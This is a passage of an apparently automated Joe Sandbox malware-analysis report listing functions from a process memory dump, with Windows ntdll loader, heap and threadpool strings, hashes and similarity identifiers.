                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017C3456
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                            • Opcode ID: e2e6c43c3b181b0c3e44ec05519e5580cc5287e883ce6abd2eb15e4b93d15aa7
                                                                                                                                            • Instruction ID: d0faf6abb377340469f1c34906818f315d2fcde74c38315606bd96c28e98746a
                                                                                                                                            • Opcode Fuzzy Hash: e2e6c43c3b181b0c3e44ec05519e5580cc5287e883ce6abd2eb15e4b93d15aa7
                                                                                                                                            • Instruction Fuzzy Hash: 0C613376680B129BD722DF1CC885B3AFBE5FF90B50F14856DE8569B241CB70E901CB91
                                                                                                                                            Function 017564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017B1028
                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017B106B
                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017B10AE
                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017B0FE5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                            • Opcode ID: feb85574e7123df2ee24110748c5de2128896eb407728c7a16d41a4e825af1fa
                                                                                                                                            • Instruction ID: 38e229556b25e96ae527539542a0d4060ee22f4c74555f8ba4b5d7a71a4f09ae
                                                                                                                                            • Opcode Fuzzy Hash: feb85574e7123df2ee24110748c5de2128896eb407728c7a16d41a4e825af1fa
                                                                                                                                            • Instruction Fuzzy Hash: DB7124B1944305AFCB61DF18C884F9BBFA8AF54764F900568FD498B14AD374D588CBD2
                                                                                                                                            Function 0177245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • LdrpDynamicShimModule, xrefs: 017BA998
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017BA9A2
                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017BA992
                                                                                                                                            • apphelp.dll, xrefs: 01772462
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                            • Opcode ID: bf13490b2bc856a2b6a42c49b28f65e127e8f129edc186f4c169f8430d089446
                                                                                                                                            • Instruction ID: e9b18f954b581c705a9eb20eebc86920d466fef4841802087714da3fcc81d64e
                                                                                                                                            • Opcode Fuzzy Hash: bf13490b2bc856a2b6a42c49b28f65e127e8f129edc186f4c169f8430d089446
                                                                                                                                            • Instruction Fuzzy Hash: 7E312A79600215ABEB35EF5DD8C5BBAF7B4FB84700F250069F9116724ADF705A41CB90
                                                                                                                                            Function 017629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • HEAP: , xrefs: 01763264
                                                                                                                                            • HEAP[%wZ]: , xrefs: 01763255
                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0176327D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                            • Opcode ID: 4e5f1859bbbc03ab7fbf02c7dfe272d4262711f2dfb1bb23b852fb504422d0c2
                                                                                                                                            • Instruction ID: 4c48e7495c39a040b91fad41f75e518b001e868c2eeae2aa7d2775f332efd785
                                                                                                                                            • Opcode Fuzzy Hash: 4e5f1859bbbc03ab7fbf02c7dfe272d4262711f2dfb1bb23b852fb504422d0c2
                                                                                                                                            • Instruction Fuzzy Hash: 50929A70A042499FEB25CF68C444BAEFBF5FF48300F1880A9E859AB792D735A945CF50
                                                                                                                                            Function 01760770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                            • Opcode ID: 10a07617ca5616bb923d2e0b1068843696cd017a4240d8e9854750c46850bbb7
                                                                                                                                            • Instruction ID: 2a7dc966266322e57f968710fbc8c494a5259434996953010846d54566f0f248
                                                                                                                                            • Opcode Fuzzy Hash: 10a07617ca5616bb923d2e0b1068843696cd017a4240d8e9854750c46850bbb7
                                                                                                                                            • Instruction Fuzzy Hash: 11F1BE74600606DFEB25CF68C894BAAF7F9FF44304F1481A8E9569B381D734EA81CB91
                                                                                                                                            Function 01776962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: $@
                                                                                                                                            • API String ID: 2994545307-1077428164
                                                                                                                                            • Opcode ID: ee51ae5af94ef6e466bb6e1c99c765de20e7e39358915f882a34b3a520ebbcd6
                                                                                                                                            • Instruction ID: 82eef25c7ca9027db3c508a6af28b0474844483afcb22995409ba8f41b3806d3
                                                                                                                                            • Opcode Fuzzy Hash: ee51ae5af94ef6e466bb6e1c99c765de20e7e39358915f882a34b3a520ebbcd6
                                                                                                                                            • Instruction Fuzzy Hash: 16C280716087419FEB2ACF28C885BABFBE5AF88714F04896DF999C7241D734D844CB52
                                                                                                                                            Function 0174A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                            • Opcode ID: 43a7bff1a3f9b6152446d97936be24f786dce0e474881a939c889661bb66821b
                                                                                                                                            • Instruction ID: 41a6645b748db8e8a569b220aa3b95d405993ddf0b65618e1da221efb362a331
                                                                                                                                            • Opcode Fuzzy Hash: 43a7bff1a3f9b6152446d97936be24f786dce0e474881a939c889661bb66821b
                                                                                                                                            • Instruction Fuzzy Hash: 1DA16F75901629ABDF32DF68CC88BAAF7B8EF84710F1041E9E909A7250D7359E84CF54
                                                                                                                                            Function 01770BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017BA121
                                                                                                                                            • LdrpCheckModule, xrefs: 017BA117
                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 017BA10F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                            • Opcode ID: 9762ff27ac5c5a54eb5507e48608753eeee4146927e6a1a075fe0ead450fecf4
                                                                                                                                            • Instruction ID: a3c20203293cb2615cde6995afa470390d0a1dc0ee9e82aeefe806a48fc32efd
                                                                                                                                            • Opcode Fuzzy Hash: 9762ff27ac5c5a54eb5507e48608753eeee4146927e6a1a075fe0ead450fecf4
                                                                                                                                            • Instruction Fuzzy Hash: B571BC74A002099FDF29EF68C985BBEF7F4EB49704F14406DE846EB255EB34AA41CB50
                                                                                                                                            Function 01760A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                            • Opcode ID: b02420750e8bf50a2a8ff23e820c9c6a0548e2194f9080e2e8d7910237c296fa
                                                                                                                                            • Instruction ID: c28562ec6047cc43977b443924f38c1d0434c8338dafebb876f9c8e0a388d74f
                                                                                                                                            • Opcode Fuzzy Hash: b02420750e8bf50a2a8ff23e820c9c6a0548e2194f9080e2e8d7910237c296fa
                                                                                                                                            • Instruction Fuzzy Hash: A761A071600301DFDB29CF28C884BAAFBE5FF45708F148599E8998B396D770E981CB91
                                                                                                                                            Function 0178C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017C82E8
                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 017C82DE
                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 017C82D7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                            • Opcode ID: bd4639cad12cb2469d2a2be83d51b859eeeb1fd6408796cd143e2bdb50144b49
                                                                                                                                            • Instruction ID: 1ede25e415c7d84b01f7a7803453d653a924abcd99c4e9c69d720ddd3790f252
                                                                                                                                            • Opcode Fuzzy Hash: bd4639cad12cb2469d2a2be83d51b859eeeb1fd6408796cd143e2bdb50144b49
                                                                                                                                            • Instruction Fuzzy Hash: EC41F1B5544311ABC732FB68D948B9BF7E8EB49750F10482EF948C3255EB70D900CBA1
                                                                                                                                            Function 0180C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • PreferredUILanguages, xrefs: 0180C212
                                                                                                                                            • @, xrefs: 0180C1F1
                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0180C1C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                            • Opcode ID: 3d8fc158da1aef01b5f2d5fa4b6c18edf3e33b29a868e963f8a7d14e79ec8624
                                                                                                                                            • Instruction ID: 3a006d2a5b8d41fb0e153380691e0f2798fc08137c26f4886728c72b7b1e91bd
                                                                                                                                            • Opcode Fuzzy Hash: 3d8fc158da1aef01b5f2d5fa4b6c18edf3e33b29a868e963f8a7d14e79ec8624
                                                                                                                                            • Instruction Fuzzy Hash: C6417171A0021DEBDF52DED8CC95BEEFBB8AB14704F1041AAEA09E7684D7749B44CB50
                                                                                                                                            Function 017E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                            • Opcode ID: 04a86124fa8f3d022a67c676528c8a76e88801bd4fe44fa794ee4e5c3b5306b3
                                                                                                                                            • Instruction ID: 120e05d63965fa20ca1e0aa91d4ff347c0b68a817be014ebaa0b1365596bfce4
                                                                                                                                            • Opcode Fuzzy Hash: 04a86124fa8f3d022a67c676528c8a76e88801bd4fe44fa794ee4e5c3b5306b3
                                                                                                                                            • Instruction Fuzzy Hash: 0941F372A046588BEB26DBE8C84CBADFBF8FF59340F140459DA02EB795D7349901CB10
                                                                                                                                            Function 017D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • LdrpCheckRedirection, xrefs: 017D488F
                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017D4888
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017D4899
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                            • Opcode ID: 4b3c77fa9bf45f34b99415b134ebaf55ff680a74ab470b12430e6921c588c66f
                                                                                                                                            • Instruction ID: 4e49eabc6f8c13afa29fca82e51db003b30ac91dab66606f225e99ea4d5882b8
                                                                                                                                            • Opcode Fuzzy Hash: 4b3c77fa9bf45f34b99415b134ebaf55ff680a74ab470b12430e6921c588c66f
                                                                                                                                            • Instruction Fuzzy Hash: 9E41D432A447599FCB21CE5CD941A26FBF5AF496A0F06066DED8AD7B11D730D800CB91
                                                                                                                                            Function 01760BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                            • Opcode ID: a746f90d801d9cea070a15365f998a96233f7238b6ce5fe8b19e31b665c649c2
                                                                                                                                            • Instruction ID: e4e17b98e499550d7238a8978af52202dc552097df6439ebb88bdc11a6df4958
                                                                                                                                            • Opcode Fuzzy Hash: a746f90d801d9cea070a15365f998a96233f7238b6ce5fe8b19e31b665c649c2
                                                                                                                                            • Instruction Fuzzy Hash: EF110371315102DFDB29DB28C895FBAF3A8EF40616F188169F80ACB295DB38DC41C750
                                                                                                                                            Function 017D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • LdrpInitializationFailure, xrefs: 017D20FA
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017D2104
                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017D20F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                            • Opcode ID: 953387b384f0414150573409786fa7976270e81d847ef66c300e2f9af57d935c
                                                                                                                                            • Instruction ID: c3ddb548e6fb1f7ec65e4dffc23d81a1736482fd8da732dee828b5824f464957
                                                                                                                                            • Opcode Fuzzy Hash: 953387b384f0414150573409786fa7976270e81d847ef66c300e2f9af57d935c
                                                                                                                                            • Instruction Fuzzy Hash: 96F0C8B5780318ABE724D65DDC56F99BB78EB40B54F100069FA4067286D9B0A601CA51
                                                                                                                                            Function 017603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: #%u
                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                            • Opcode ID: 60160c17215e575406b80695e04ebeb2ccd0818ffd49a51ea5db861920fe9944
                                                                                                                                            • Instruction ID: dea26185b5106cda07f732e512e4560d14d12e06e6589e5ca616c12a2b7f8c6a
                                                                                                                                            • Opcode Fuzzy Hash: 60160c17215e575406b80695e04ebeb2ccd0818ffd49a51ea5db861920fe9944
                                                                                                                                            • Instruction Fuzzy Hash: 52716971A0010A9FDB11DFA8C994FAEBBF8FF18744F144065EA06A7256EB34ED45CB60
                                                                                                                                            Function 0175A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • LdrResSearchResource Exit, xrefs: 0175AA25
                                                                                                                                            • LdrResSearchResource Enter, xrefs: 0175AA13
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                            • Opcode ID: 4737c614be0a944e7fdead352b7a4ba7ee5b5a7572d6bd88b10be60a22f3917f
                                                                                                                                            • Instruction ID: 8789165b2188dc8df454ee77c157165863186471e3352097ddb60cf8be801491
                                                                                                                                            • Opcode Fuzzy Hash: 4737c614be0a944e7fdead352b7a4ba7ee5b5a7572d6bd88b10be60a22f3917f
                                                                                                                                            • Instruction Fuzzy Hash: A2E18271A012199FEF62CE99C984BEEFBBABF18310F104679ED01E7251D7B49941CB50
                                                                                                                                            Function 0181A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `$`
                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction ID: 49d1fcbe331b994ba0243417fd192fcef81576e94ba64008442cab221f0cea1a
                                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction Fuzzy Hash: B1C1E3322053829BE729CF28C845B6BBBE9AFC4318F044E2DF696C7299D775D605CB41
                                                                                                                                            Function 017CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                            • Opcode ID: 089d8f368e0ff73bdebe97b75470f71b1cf95d1119f3c6e58d07757830ab3b00
                                                                                                                                            • Instruction ID: 12318a8fcccea9985f9379099bc6e606416aca798d98de8d8f5968b78fdaa3de
                                                                                                                                            • Opcode Fuzzy Hash: 089d8f368e0ff73bdebe97b75470f71b1cf95d1119f3c6e58d07757830ab3b00
                                                                                                                                            • Instruction Fuzzy Hash: 08614A71E403199FDB14DFA88844BAEFBF9FB48B00F54406DE649EB251DB31A940CB50
                                                                                                                                            Function 017F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$MUI
                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                            • Opcode ID: 97421074a4fef9c2b27b80933809476847a66f2c33662c73dc7b3697c09bc10b
                                                                                                                                            • Instruction ID: fcf70f95a52c1d577375ee5908a199a54e5d559e0a92941f96f3ccccadc0bfc2
                                                                                                                                            • Opcode Fuzzy Hash: 97421074a4fef9c2b27b80933809476847a66f2c33662c73dc7b3697c09bc10b
                                                                                                                                            • Instruction Fuzzy Hash: 45510771E0021DAFDF11EFA9CC84AEFFBB9AB44754F100529EA11B7294D6309A45CBA0
                                                                                                                                            Function 017504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0175063D
                                                                                                                                            • kLsE, xrefs: 01750540
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                            • Opcode ID: 60ac7e9e3815c741be3ad8053f352064e3d712c2a738b65eb539a6cb249a677a
                                                                                                                                            • Instruction ID: a7cd9a06af012f20c46bac9fac84fc409f0223d747a4a53b09eed199d6258f33
                                                                                                                                            • Opcode Fuzzy Hash: 60ac7e9e3815c741be3ad8053f352064e3d712c2a738b65eb539a6cb249a677a
                                                                                                                                            • Instruction Fuzzy Hash: 5F519DB15047428FD765DF68C544AA7FBE4EF84304F20483EFAAA87241E7B4D546CBA2
                                                                                                                                            Function 0175A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0175A2FB
                                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0175A309
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                            • API String ID: 0-2876891731
                                                                                                                                            • Opcode ID: b1871174e08ebed8b7a1e28aff5fb572641b70ac3a71f714475c554a646cd68f
                                                                                                                                            • Instruction ID: aa5791e2cda9a1e6f3d0231c9e933d0231687afaf7be8e318793eb801182d194
                                                                                                                                            • Opcode Fuzzy Hash: b1871174e08ebed8b7a1e28aff5fb572641b70ac3a71f714475c554a646cd68f
                                                                                                                                            • Instruction Fuzzy Hash: 3341E131A05649DBDB11CF59C884BAEFBB4FF84308F2441A5ED04DB292EBB5D940CB50
                                                                                                                                            Function 0178A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                            • Opcode ID: f0676461e4407f0c196f4f807d3106bbdaf37a45e79500bf695ae01eeaadfdf3
                                                                                                                                            • Instruction ID: e33cc0b7a7adec1422105e230eb2bc586e5692b4dc0d78c9eff156bac79c6037
